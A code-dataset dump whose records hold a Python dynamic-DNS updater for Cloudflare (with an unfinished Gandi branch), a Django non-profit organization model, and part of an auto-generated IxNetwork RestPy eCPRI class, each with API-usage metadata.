"line_number": 185, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 187, "usage_type": "call"}, {"api_name": "tensorflow.train.get_checkpoint_state", "line_number": 230, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 230, "usage_type": "attribute"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 232, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 232, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Saver", "line_number": 243, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 243, "usage_type": "attribute"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 244, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 244, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Saver", "line_number": 248, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 248, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 255, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 257, "usage_type": "call"}, {"api_name": "gym.make", "line_number": 268, 
"usage_type": "call"}, {"api_name": "{'ReplayBuffer': 'memory.sp_memory.ReplayBuffer'}", "line_number": 276, "usage_type": "call"}, {"api_name": "time.time", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 291, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 297, "usage_type": "call"}, {"api_name": "time.time", "line_number": 307, "usage_type": "call"}, {"api_name": "time.time", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 315, "usage_type": "call"}, {"api_name": "time.time", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 316, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 334, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 334, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 338, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 338, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 339, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 339, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 340, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 341, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 341, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 343, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 343, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 344, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 344, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 345, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 345, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 346, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 346, "usage_type": "name"}]} +{"seq_id": "559986958", "text": "#!/usr/bin/env python3\n\"\"\"\n * Build By:\n * https://itheo.tech 2021\n * MIT License\n * Script to set your home (or business) IP address via cloudflare dns on A-record domain record\n * Specially used when you do not have a fixed IP address\n\"\"\"\nimport sys\nimport configparser\nimport logging\nimport logging.handlers as handlers\nimport requests\nimport threading\nfrom time import sleep\nimport concurrent.futures\nfrom concurrent.futures import ALL_COMPLETED\nimport xmlrpc\n\nimport CloudFlare\n\n\nlogger = logging.getLogger(\"ddns\")\nlogger.setLevel(logging.INFO)\n\nformatter = logging.Formatter(\"%(asctime)s - %(name)s - %(processName)s - %(threadName)s - %(levelname)s - %(message)s\")\n\nlogHandler = handlers.TimedRotatingFileHandler(\n \"logs/normal.log\", when=\"M\", interval=1, backupCount=0\n)\nlogHandler.setLevel(logging.INFO)\nlogHandler.setFormatter(formatter)\n\nerrorLogHandler = handlers.RotatingFileHandler(\n \"logs/error.log\", maxBytes=5000, backupCount=0\n)\nerrorLogHandler.setLevel(logging.ERROR)\nerrorLogHandler.setFormatter(formatter)\n\nlogger.addHandler(logHandler)\nlogger.addHandler(errorLogHandler)\n# logger.info(\"A Sample Log Statement\")\n# logger.error(\"An error log statement\")\n\n\nclass auto_ddns:\n def __init__(self, config_in) -> None:\n 
self.type = config_in[\"type\"]\n self.zone_id = config_in[\"zone_id\"]\n self.api_token = config_in[\"api_token\"]\n self.ip_address_type = config_in[\"ip_address_type\"]\n self.dns_name = config_in[\"dns_name\"]\n\n logger.info(\n f\" {self.zone_id} {self.api_token } {self.ip_address_type} {self.dns_name} \"\n )\n self.current_ip = None\n self.external_ip = None\n self.cf = None\n self.new_dns_record = None\n self.dns_id = None\n\n def main(self):\n self.current_ip = self.get_ip()\n\n if not self.current_ip:\n return False\n if self.type.lower() == \"cloudflare\":\n if not self.connect_cloud_dns():\n return False\n\n if not self.get_cloud_dns():\n return False\n\n if self.external_ip is not None and self.external_ip == self.current_ip:\n return True\n\n if not self.set_cloud_dns():\n return False\n if self.type.lower() == \"gandi\":\n if not self.connect_gandi_dns():\n return False\n\n if not self.get_gandi_dns():\n return False\n\n if self.external_ip is not None and self.external_ip == self.current_ip:\n return True\n\n if not self.set_cloud_dns():\n return False\n\n return True\n\n\n\n @staticmethod\n def get_ip():\n try:\n result = requests.get(\"https://checkip.amazonaws.com\")\n if result.status_code == 200:\n print(f\"got ip\")\n return result.text.strip()\n else:\n print(\"No access to outside world\")\n return False\n except Exception as e:\n logger.error(e)\n return False\n\n def connect_gandi_dns(self):\n api = xmlrpc.ServerProxy('https://rpc.gandi.net/xmlrpc/')\n apikey=self.api_token\n r = api.catalog.list(apikey, {'product': {'type': 'domain', 'description': '.at'}})\n print(r)\n pass\n\n def get_gandi_dns(self):\n #get the dns\n set_gandi_dns()\n\n def set_gandi_dns(self):\n pass\n\n def connect_cloud_dns(self):\n try:\n self.cf = CloudFlare.CloudFlare(token=self.api_token)\n except CloudFlare.exceptions.CloudFlareAPIError as e:\n print(\"connection to cloudlfare failed\")\n logger.error(\"API connection failed: {e}\")\n return False\n\n return True\n\n def get_cloud_dns(self):\n print(self.dns_name)\n try:\n params = {\n \"name\": self.dns_name,\n \"match\": \"all\",\n \"type\": self.ip_address_type,\n }\n logger.info(f'params {params}, {self.zone_id}, {self.dns_name}')\n dns_records = self.cf.zones.dns_records.get(self.zone_id, params=params)\n\n except CloudFlare.exceptions.CloudFlareAPIError as e:\n logger.error(\n \"/zones/dns_records/export %s - %d %s - api call failed\"\n % (self.zone_id, e, e)\n )\n return False\n logger.info(f\"dns_records {self.dns_name} {dns_records}\")\n for dns_record in dns_records:\n try:\n self.external_ip = dns_record[\"content\"]\n\n if self.current_ip != self.external_ip:\n self.dns_id = dns_record[\"id\"] #why\n\n self.new_dns_record = {\n \"name\": self.dns_name,\n \"type\": self.ip_address_type,\n \"content\": self.current_ip,\n \"proxied\": dns_record[\"proxied\"],\n }\n else:\n logger.info(\"Getter unchanged\")\n return False\n except Exception as e:\n logger.error(e)\n return False\n logger.info(\"GETTER RAN OK\")\n return True\n\n def set_cloud_dns(self):\n try:\n logger.info(f\"self.new_dns_record {self.new_dns_record}\")\n dns_record = self.cf.zones.dns_records.post(\n self.zone_id, self.dns_id, data=self.new_dns_record\n ) # ,\n print(dns_record)\n except CloudFlare.exceptions.CloudFlareAPIError as e:\n logger.error(\n \"/zones.dns_records.post %s - %d %s - api call failed\"\n % (self.dns_name, e, e)\n )\n return False\n\n logger.info(\n \"UPDATED: %s %s -> %s\"\n % (self.dns_name, self.external_ip, self.current_ip)\n )\n 
return True\n\n\ndef run_one_ddns(config):\n    print(config['dns_name'])\n    #logging(f'starting {config[dns_name]}')\n\n    ddns = auto_ddns(config)\n\n    while True:\n        if ddns.main():\n            sleep(300) # 5 minutes\n        else:\n            # I guess something went wrong, let's give the script a bit more time.\n            sleep(600) # 10 minutes\n\n\nif __name__ == \"__main__\":\n    configs = configparser.ConfigParser()\n    configs.read(\"config.ini\")\n    config_parser = [dict(configs.items(s)) for s in configs.sections()]\n    print(config_parser)\n    with concurrent.futures.ThreadPoolExecutor(len(config_parser)) as executor:\n        fs = [executor.submit(run_one_ddns, config) for config in config_parser]\n        # x = threading.Thread(target=run_one_ddns,args=(configs[configs.sections()],range(len(configs.sections()))))\n        concurrent.futures.wait(fs=fs, timeout=None, return_when=ALL_COMPLETED)\n    print('Done')\n\n\n", "sub_path": "ddns.py", "file_name": "ddns.py", "file_ext": "py", "file_size_in_byte": 6782, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 24, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.handlers.TimedRotatingFileHandler", "line_number": 28, "usage_type": "call"}, {"api_name": "logging.handlers", "line_number": 28, "usage_type": "name"}, {"api_name": "logging.INFO", "line_number": 31, "usage_type": "attribute"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.handlers", "line_number": 34, "usage_type": "name"}, {"api_name": "logging.ERROR", "line_number": 37, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 100, "usage_type": "call"}, {"api_name": "xmlrpc.client.ServerProxy", "line_number": 112, "usage_type": "call"}, {"api_name": "CloudFlare.CloudFlare", "line_number": 127, "usage_type": "call"}, {"api_name": "CloudFlare.exceptions", "line_number": 128, "usage_type": "attribute"}, {"api_name": "CloudFlare.exceptions", "line_number": 146, "usage_type": "attribute"}, {"api_name": "CloudFlare.exceptions", "line_number": 182, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 204, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 207, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 211, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.ThreadPoolExecutor", "line_number": 215, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 215, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 215, "usage_type": "name"}, {"api_name": "concurrent.futures.futures.wait", "line_number": 218, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 218, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 218, "usage_type": "name"}, {"api_name": "concurrent.futures.ALL_COMPLETED", "line_number": 218, "usage_type": "name"}]} +{"seq_id": "130431952", "text": "from django.db import models\nfrom django.utils import timezone\nfrom django.contrib.auth.models import User\nfrom django_countries.fields import CountryField\nfrom autoslug.fields import AutoSlugField\n\n\norgCategories = (\n    ('animal','Animal Welfare'),\n    ('arts-culture','Arts and Culture'),\n    ('children','Children'),\n    ('civil-rights','Civil Rights'),\n    ('climate-change','Climate Change'),\n    
('disaster-relief','Disaster Relief'),\n ('economic-development','Economic Development'),\n ('education','Education'),\n ('environment','Environment'),\n ('health','Health'),\n ('hiv-aids','HIV-AIDS'),\n ('human-rights','Human Rights'),\n ('hunger','Hunger'),\n ('poverty','Poverty'),\n ('science-technology','Science and Technology'),\n ('social-services','Social Services'),\n ('women-girls','Women and Girls'),\n ('other','Other')\n)\n\n\nclass NonProfitOrganization(models.Model):\n name = models.CharField('Name', max_length=255)\n name_slug = AutoSlugField(populate_from='name', unique=True)\n ein = models.CharField('EIN', primary_key=True, max_length=70)\n description = models.TextField('Description', blank=True)\n mission = models.TextField('Mission', blank=True)\n address_line_1 = models.CharField('Address Line 1', max_length=200, blank=True)\n address_line_2 = models.CharField('Address Line 2', max_length=200, blank=True)\n city = models.CharField('City', max_length=50, blank=True)\n state = models.CharField('State', max_length=50, blank=True)\n zipcode = models.CharField('Zip Code', max_length=50, blank=True)\n country = CountryField(default='US')\n email = models.EmailField('Email')\n url = models.URLField('URL', default=\"\", blank=True)\n phone = models.CharField('Phone', max_length=70)\n logo = models.ImageField(upload_to='org_images/%Y/%m/%d', blank=True)\n is_faith_based = models.BooleanField('Faith Based', default=False)\n join_date = models.DateTimeField('Join Date', editable=False, null=True)\n last_update_date = models.DateTimeField('Last Update', blank=True)\n is_locked = models.BooleanField('Organization Locked', default=True)\n category = models.CharField('Category', max_length=255, choices = orgCategories)\n primary_contact = models.ForeignKey(User, verbose_name='Primary Contact', blank=True, null=True)\n\n def __unicode__(self):\n return self.name\n\n def save(self, *args, **kwargs):\n \"\"\" On save, update timestamps \"\"\"\n if not self.ein:\n self.join_date = timezone.now()\n self.last_update_date = timezone.now()\n return super(NonProfitOrganization, self).save(*args, **kwargs)\n\n def get_absolute_url(self):\n return '/organization/%s/' % self.name_slug\n\n def get_full_address(self):\n full_address = ''\n if self.address_line_1:\n full_address += self.address_line_1 + ', '\n if self.address_line_2:\n full_address += self.address_line_2 + ', '\n if self.city:\n full_address += self.city + ', '\n if self.state:\n full_address += self.state + ', '\n if self.zipcode:\n full_address += self.zipcode + ', '\n if self.country:\n full_address += str(self.country.name)\n return full_address", "sub_path": "js1kg/organization/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 3236, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.db.models.Model", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 31, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 31, "usage_type": "name"}, {"api_name": "autoslug.fields.AutoSlugField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 33, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 34, "usage_type": "call"}, {"api_name": 
"django.db.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 35, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 35, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 37, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 37, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 39, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 40, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 40, "usage_type": "name"}, {"api_name": "django_countries.fields.CountryField", "line_number": 41, "usage_type": "call"}, {"api_name": "django.db.models.EmailField", "line_number": 42, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 42, "usage_type": "name"}, {"api_name": "django.db.models.URLField", "line_number": 43, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 44, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 44, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 45, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 45, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 46, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 46, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 47, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 47, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 48, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 48, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 49, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 49, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 50, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 50, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 51, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 51, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 51, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 59, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 59, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 60, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "443043393", "text": "# MIT LICENSE\n#\n# Copyright 1997 - 2020 by IXIA Keysight\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, 
sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\nimport sys\nfrom ixnetwork_restpy.base import Base\nfrom ixnetwork_restpy.files import Files\n\nif sys.version_info >= (3, 5):\n from typing import List, Any, Union\n\n\nclass ECpriRe(Base):\n \"\"\"EcpriRe\n The ECpriRe class encapsulates a list of eCpriRe resources that are managed by the user.\n A list of resources can be retrieved from the server using the ECpriRe.find() method.\n The list can be managed by using the ECpriRe.add() and ECpriRe.remove() methods.\n \"\"\"\n\n __slots__ = ()\n _SDM_NAME = \"eCpriRe\"\n _SDM_ATT_MAP = {\n \"ActionType\": \"actionType\",\n \"Active\": \"active\",\n \"Address\": \"address\",\n \"CompensationValue\": \"compensationValue\",\n \"ConnectedVia\": \"connectedVia\",\n \"Count\": \"count\",\n \"DelayMeasurementId\": \"delayMeasurementId\",\n \"DescriptiveName\": \"descriptiveName\",\n \"DummyBytesLength\": \"dummyBytesLength\",\n \"ElementId\": \"elementId\",\n \"Errors\": \"errors\",\n \"EventId\": \"eventId\",\n \"EventSequenceNumber\": \"eventSequenceNumber\",\n \"EventType\": \"eventType\",\n \"MessageType\": \"messageType\",\n \"Multiplier\": \"multiplier\",\n \"Name\": \"name\",\n \"NumberOfFaultSubObjects\": \"numberOfFaultSubObjects\",\n \"ReadWriteType\": \"readWriteType\",\n \"RemoteResetId\": \"remoteResetId\",\n \"ReservedActionType\": \"reservedActionType\",\n \"ReservedEventType\": \"reservedEventType\",\n \"ReservedResetCode\": \"reservedResetCode\",\n \"ResetCodeOp\": \"resetCodeOp\",\n \"RmaAction\": \"rmaAction\",\n \"RmaDataLength\": \"rmaDataLength\",\n \"RtcDataLength\": \"rtcDataLength\",\n \"SequenceId\": \"sequenceId\",\n \"SessionStatus\": \"sessionStatus\",\n \"StackedLayers\": \"stackedLayers\",\n \"StartingRmaId\": \"startingRmaId\",\n \"StartingRtcId\": \"startingRtcId\",\n \"StateCounts\": \"stateCounts\",\n \"Status\": \"status\",\n \"TimeStamp\": \"timeStamp\",\n \"VendorSpecificPayloadLength\": \"vendorSpecificPayloadLength\",\n }\n _SDM_ENUM_MAP = {\n \"messageType\": [\n \"realTimeControlData\",\n \"remoteMemoryAccess\",\n \"onewayDelayMeasurement\",\n \"remoteReset\",\n \"eventIndication\",\n ],\n \"status\": [\n \"configured\",\n \"error\",\n \"mixed\",\n \"notStarted\",\n \"started\",\n \"starting\",\n \"stopping\",\n ],\n }\n\n def __init__(self, parent, list_op=False):\n super(ECpriRe, self).__init__(parent, list_op)\n\n @property\n def Connector(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector): An instance of the Connector class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b 
import (\n Connector,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"Connector\", None) is not None:\n return self._properties.get(\"Connector\")\n return Connector(self)\n\n @property\n def ECpriFaultSubObjectsList(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ecprifaultsubobjectslist_066a935ffc4b8b88998000da08d713eb.ECpriFaultSubObjectsList): An instance of the ECpriFaultSubObjectsList class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.ecprifaultsubobjectslist_066a935ffc4b8b88998000da08d713eb import (\n ECpriFaultSubObjectsList,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"ECpriFaultSubObjectsList\", None) is not None:\n return self._properties.get(\"ECpriFaultSubObjectsList\")\n return ECpriFaultSubObjectsList(self)\n\n @property\n def OranDU(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.orandu_3c913d8352aa36ef882a1ba8a0683584.OranDU): An instance of the OranDU class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.orandu_3c913d8352aa36ef882a1ba8a0683584 import (\n OranDU,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"OranDU\", None) is not None:\n return self._properties.get(\"OranDU\")\n return OranDU(self)\n\n @property\n def OranRU(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.oranru_c5d61b81f2557e778753a97ef8b7363b.OranRU): An instance of the OranRU class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.oranru_c5d61b81f2557e778753a97ef8b7363b import (\n OranRU,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"OranRU\", None) is not None:\n return self._properties.get(\"OranRU\")\n return OranRU(self)\n\n @property\n def ActionType(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Action Type value 0x00 and 0x01 are used when an eCPRI node initiates a one-way delay measurement in direction from its own node to another node. Value 0x02 is used when an eCPRI node needs to know the one-way delay from another node to itself.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"ActionType\"]))\n\n @property\n def Active(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Activate/Deactivate Configuration\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"Active\"]))\n\n @property\n def Address(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The Address is a 48-bit value. Details such as whether the memory on the opposite node is organized in one or more memory banks or whether an address offset is signaled over the interface etc. are vendor specific. 
The Element ID could be used for identifying a specific memory hardware instance.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"Address\"]))\n\n @property\n def CompensationValue(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): When Action Type is set to 0x00 (Request), 0x02 (Response) or 0x05 (Follow_Up) in the message, this field will contain the Compensation Value which is the compensation time measured in nanoseconds and multiplied by 2 to the power 16 and follows the format for the correctionField in the common message header specified in IEEE 1588-2008 Clause 13.3 [13]. When Action Type is set to 0x03 (Remote Request) or 0x04 (Remote Request with Follow_Up) the time information fields TimeStamp and Compensation Value are set to 0b in all bits. A Compensation Value of 0 (zero) is a valid value.Example: A Compensation Value of 183.5 ns is represented as 0000000000B78000 with base 16.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"CompensationValue\"])\n )\n\n @property\n def ConnectedVia(self):\n # type: () -> List[str]\n \"\"\"DEPRECATED\n Returns\n -------\n - list(str[None | /api/v1/sessions/1/ixnetwork/topology]): List of layers this layer is used to connect with to the wire.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"ConnectedVia\"])\n\n @ConnectedVia.setter\n def ConnectedVia(self, value):\n # type: (List[str]) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"ConnectedVia\"], value)\n\n @property\n def Count(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Count\"])\n\n @property\n def DelayMeasurementId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The Measurement ID is a 1-byte value used by the sender of the request when the response is received to distinguish between different measurements, i.e. the receiver of the request shall copy the ID from the request into the response message.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"DelayMeasurementId\"])\n )\n\n @property\n def DescriptiveName(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"DescriptiveName\"])\n\n @property\n def DummyBytesLength(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The number of dummy bytes included in the eCPRI-payload will be defined by the eCPRI payload size field in the eCPRI common header. Due to network characteristics, a small message might take shorter time through the network than a large one, with the dummy bytes the one-way delay estimation can be improved. 
The insertion of dummy bytes is only needed when the Action Type set to 0x00 (Request) or to 0x01(Request with Follow_Up).\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"DummyBytesLength\"])\n )\n\n @property\n def ElementId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Depending on implementation the Element ID could be used for instance to point out a specific instance of a generic hardware function.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"ElementId\"]))\n\n @property\n def Errors(self):\n \"\"\"\n Returns\n -------\n - list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork/],arg2:list[str])): A list of errors that have occurred\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Errors\"])\n\n @property\n def EventId(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): A 1-byte value set by the transmitter of an Event Indication or a Synchronization Request to enable identification of the acknowledge response.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"EventId\"]))\n\n @property\n def EventSequenceNumber(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): The Sequence Number is a 1-byte value that is incremented each time the transmitter sends the Event Indication with Event Type set to 0x00 (Fault(s) Indication). The receiver will use the sequence number to ensure that the correct status for a specific combination of {Element-ID; Fault-value} is used. Due to the nature of the packet based fronthaul network, packets might be delivered out of order and a sequence number is needed to handle this scenario. 
When a fault indication is not acknowledged the transmitter will re-transmit the fault, setting the sequence number to the same value used in the initial transmission.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(\n self, self._get_attribute(self._SDM_ATT_MAP[\"EventSequenceNumber\"])\n )\n\n @property\n def EventType(self):\n # type: () -> 'Multivalue'\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.multivalue.Multivalue): Event Type value ranges from 0x00 to 0xFF, where 0x00 represents Fault(s) Indication, 0x01 represents Fault(s) Indication Acknowledge, 0x02 represents Notification(s) Indication, 0x03 represents Synchronization Request, 0x04 represents Synchronization Acknowledge, 0x05 represents Synchronization End Indication and values from 0x06 to 0xFF are Reserved.\n \"\"\"\n from ixnetwork_restpy.multivalue import Multivalue\n\n return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP[\"EventType\"]))\n\n @property\n def MessageType(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str(realTimeControlData | remoteMemoryAccess | onewayDelayMeasurement | remoteReset | eventIndication): Message Type\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"MessageType\"])\n\n @MessageType.setter\n def MessageType(self, value):\n # type: (str) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"MessageType\"], value)\n\n @property\n def Multiplier(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: Number of layer instances per parent instance 